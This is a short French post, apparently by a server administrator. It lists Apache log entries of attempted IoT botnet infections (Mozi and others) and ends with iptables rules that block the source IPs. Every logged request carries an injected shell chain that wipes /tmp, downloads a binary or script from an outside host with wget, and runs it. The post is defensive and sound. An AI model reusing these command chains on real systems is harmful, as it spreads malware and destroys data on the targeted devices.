Voici la liste :
61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-" 59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world" 68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world" 209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata" 209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
A noter que l’IP 45.14.149.244 est en Roumanie et 27.45.11.127 est en Chine.
Bilan :
iptables -A INPUT -s 45.14.149.244 -j DROP iptables -A INPUT -s 209.141.33.232 -j DROP iptables -A INPUT -s 68.150.109.112 -j DROP iptables -A INPUT -s 114.33.156.230 -j DROP iptables -A INPUT -s 59.63.206.200 -j DROP iptables -A INPUT -s 59.97.193.131 -j DROP iptables -A INPUT -s 117.241.51.177 -j DROP iptables -A INPUT -s 119.123.236.177 -j DROP iptables -A INPUT -s 27.5.37.175 -j DROP iptables -A INPUT -s 27.45.11.127 -j DROP iptables -A INPUT -s 61.242.40.137 -j DROP iptables -A INPUT -s 182.121.231.1 -j DROP iptables-save > /etc/iptables/rules.v4
Misère.